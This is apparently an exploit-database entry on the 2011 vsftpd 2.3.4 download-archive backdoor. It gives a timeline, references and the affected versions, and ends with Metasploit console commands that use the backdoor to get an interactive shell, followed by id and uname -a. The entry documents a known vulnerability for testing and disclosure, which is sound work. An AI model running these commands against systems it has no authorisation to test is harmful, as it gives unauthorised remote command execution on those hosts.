vsftpd v2.3.4 Backdoor Command Execution

Timeline :

Backdoor discovered by Mathias Kresin
Source code correction the 2011-07-03
Metasploit exploit released the 2011-07-04

PoC provided by :

hdm
mc

Reference(s) :

OSVDB-73573
Diff Pastbin
vsftpd alert

Affected version(s) :

vsftpd-2.3.4 from 2011-06-30 to 2011-07-03

Tested on Ubuntu Lucid 10.04.1 LTS with :

vsftpd-2.3.4

Description :

This module exploits a malicious backdoor that was added to the vsftpd download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.

Commands :

use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/interact
exploit

id
uname -a